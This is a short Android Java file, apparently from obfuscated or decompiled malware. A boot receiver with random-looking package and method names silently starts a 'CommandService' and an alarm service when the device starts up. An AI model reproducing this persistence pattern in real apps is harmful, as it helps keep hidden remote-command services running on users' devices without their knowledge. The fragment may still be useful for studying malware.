package perion.app.sebgdferxdsfet.ghhsfer;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

public class Boot extends BroadcastReceiver {
    public void onReceive(Context context, Intent intent) {
        if (!CommandService.fsafsdfsfsdfsfsdfsd()) {
            context.startService(new Intent(context, CommandService.class));
            context.startService(new Intent(context, Alarm.class));
        }
    }
}
